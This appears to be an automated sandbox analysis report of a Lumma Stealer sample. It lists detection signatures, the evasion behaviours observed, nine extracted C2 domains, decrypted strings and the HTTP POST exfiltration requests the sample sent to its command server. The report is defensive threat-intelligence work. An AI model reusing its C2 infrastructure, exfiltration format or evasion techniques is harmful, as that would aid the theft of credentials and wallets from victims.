
Windows Analysis Report
P0SJULJxI0.exe

Overview

General Information

Sample name: P0SJULJxI0.exe (renamed because original name is a hash value)
Original sample name: e5d4e86f709d076fa5bd3e10007f487f.exe
Analysis ID: 1580880
MD5: e5d4e86f709d076fa5bd3e10007f487f
SHA1: a3b62c9255ed1c479cc5a01110d33d59f50bc383
SHA256: 774d9d60d5ef51a4ce1780aae20047a0cd00c45f25abd0cbba77028c5b752cf4
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Classification chart (categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious)
  • System is w10x64
  • P0SJULJxI0.exe (PID: 5272 cmdline: "C:\Users\user\Desktop\P0SJULJxI0.exe" MD5: E5D4E86F709D076FA5BD3E10007F487F)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{
  "C2 url": [
    "mindhandru.buzz",
    "prisonyfork.buzz",
    "rebuildeso.buzz",
    "scentniej.buzz",
    "hummskitnj.buzz",
    "inherineau.buzz",
    "cashfuzysao.buzz",
    "screwamusresz.buzz",
    "appliacnesot.buzz"
  ],
  "Build id": "LOGS11--LiveTraffic"
}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author
00000000.00000003.2067395256.00000000014C3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2096219412.00000000014C3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2100391243.0000000001484000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2100238097.0000000001484000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: P0SJULJxI0.exe PID: 5272 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
(3 further entries not shown)

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-26T12:49:12.560680+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49704 | 172.67.165.185 | 443 | TCP
2024-12-26T12:49:25.875475+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49705 | 172.67.165.185 | 443 | TCP
2024-12-26T12:49:28.543470+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49707 | 172.67.165.185 | 443 | TCP
2024-12-26T12:49:50.522564+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49711 | 172.67.165.185 | 443 | TCP
2024-12-26T12:50:12.820235+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49713 | 172.67.165.185 | 443 | TCP
2024-12-26T12:50:15.777767+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49714 | 172.67.165.185 | 443 | TCP
2024-12-26T12:50:54.725222+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49776 | 172.67.165.185 | 443 | TCP
2024-12-26T12:50:56.377606+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49782 | 172.67.165.185 | 443 | TCP
2024-12-26T12:49:24.546737+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49704 | 172.67.165.185 | 443 | TCP
2024-12-26T12:49:26.668292+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49705 | 172.67.165.185 | 443 | TCP
2024-12-26T12:49:24.546737+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49704 | 172.67.165.185 | 443 | TCP
2024-12-26T12:49:26.668292+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.8 | 49705 | 172.67.165.185 | 443 | TCP
2024-12-26T12:49:48.959861+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49707 | 172.67.165.185 | 443 | TCP
2024-12-26T12:50:52.235124+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49714 | 172.67.165.185 | 443 | TCP

AV Detection

Source: P0SJULJxI0.exe | Avira: detected
Source: https://mindhandru.buzz:443/api | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/api; | Avira URL Cloud: Label: malware
Source: P0SJULJxI0.exe.5272.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["mindhandru.buzz", "prisonyfork.buzz", "rebuildeso.buzz", "scentniej.buzz", "hummskitnj.buzz", "inherineau.buzz", "cashfuzysao.buzz", "screwamusresz.buzz", "appliacnesot.buzz"], "Build id": "LOGS11--LiveTraffic"}
Source: P0SJULJxI0.exe | Virustotal: Detection: 52%
Source: P0SJULJxI0.exe | ReversingLabs: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: P0SJULJxI0.exe | Joe Sandbox ML: detected
Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmp | String decryptor: hummskitnj.buzz
Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmp | String decryptor: cashfuzysao.buzz
Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmp | String decryptor: appliacnesot.buzz
Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmp | String decryptor: screwamusresz.buzz
Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmp | String decryptor: inherineau.buzz
Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmp | String decryptor: scentniej.buzz
Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmp | String decryptor: rebuildeso.buzz
Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmp | String decryptor: prisonyfork.buzz
Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmp | String decryptor: mindhandru.buzz
Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000003.1463261611.0000000005160000.00000004.00001000.00020000.00000000.sdmp | String decryptor: LOGS11--LiveTraffic
Source: P0SJULJxI0.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49776 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49782 version: TLS 1.2

Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49704 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49704 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49707 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49705 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49705 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49714 -> 172.67.165.185:443
Source: Malware configuration extractor | URLs: mindhandru.buzz
Source: Malware configuration extractor | URLs: prisonyfork.buzz
Source: Malware configuration extractor | URLs: rebuildeso.buzz
Source: Malware configuration extractor | URLs: scentniej.buzz
Source: Malware configuration extractor | URLs: hummskitnj.buzz
Source: Malware configuration extractor | URLs: inherineau.buzz
Source: Malware configuration extractor | URLs: cashfuzysao.buzz
Source: Malware configuration extractor | URLs: screwamusresz.buzz
Source: Malware configuration extractor | URLs: appliacnesot.buzz
Source: Joe Sandbox View | IP Address: 172.67.165.185 172.67.165.185
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49704 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49776 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49782 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49711 -> 172.67.165.185:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 53 | Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=XHG9JAW63CJSAIPNS | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12846 | Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=KYAYF5FBE89TQ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15051 | Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=4HAC1AYLFTF0J3 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20224 | Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=UAQF6MBLGQ601 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1181 | Host: mindhandru.buzz
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: mindhandru.buzz
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: mindhandru.buzz
Source: P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: P0SJULJxI0.exe, 00000000.00000003.2067395256.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096219412.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2505924911.00000000014CC000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2480422715.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2504533106.00000000014CC000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1625381463.000000000149B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: P0SJULJxI0.exe, 00000000.00000003.2067997842.000000000151D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: P0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: P0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: P0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: P0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: P0SJULJxI0.exe, 00000000.00000003.1625381463.0000000001462000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2506947715.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1625381463.000000000149B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/
Source: P0SJULJxI0.exe, 00000000.00000003.2520864101.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2506947715.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2525190295.00000000014F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/;.C
Source: P0SJULJxI0.exe, 00000000.00000003.2482482732.0000000005C21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/MPh
Source: P0SJULJxI0.exe, 00000000.00000003.2506445308.0000000001462000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2504979670.0000000001462000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/W/
Source: P0SJULJxI0.exe, 00000000.00000003.1625381463.000000000149B000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2481187488.0000000001462000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/api
Source: P0SJULJxI0.exe, 00000000.00000003.2481187488.0000000001484000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/api;
Source: P0SJULJxI0.exe, 00000000.00000003.2481187488.0000000001462000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/apiX/
Source: P0SJULJxI0.exe, 00000000.00000002.2524940975.0000000001462000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/apih&
Source: P0SJULJxI0.exe, 00000000.00000002.2524940975.0000000001484000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/apis
Source: P0SJULJxI0.exe, 00000000.00000003.2067395256.00000000014F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/c)
Source: P0SJULJxI0.exe, 00000000.00000003.1625381463.000000000149B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/d
Source: P0SJULJxI0.exe, 00000000.00000003.2520864101.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2525190295.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1625381463.000000000149B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/pi
Source: P0SJULJxI0.exe, 00000000.00000003.2096219412.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2520864101.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2525190295.00000000014F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/pid
Source: P0SJULJxI0.exe, 00000000.00000003.2096219412.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2100181066.00000000014F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/s
Source: P0SJULJxI0.exe, 00000000.00000003.2520864101.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2525190295.00000000014F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/ste
Source: P0SJULJxI0.exe, 00000000.00000003.2100181066.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096219412.00000000014C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz:443/api
Source: P0SJULJxI0.exe, 00000000.00000003.2068940488.0000000005D4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: P0SJULJxI0.exe, 00000000.00000003.2068940488.0000000005D4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: P0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: P0SJULJxI0.exe, 00000000.00000003.1626718719.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626551778.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1626630650.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: P0SJULJxI0.exe, 00000000.00000003.2095692358.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2096545927.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: P0SJULJxI0.exe, 00000000.00000003.2095511369.000000000151A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
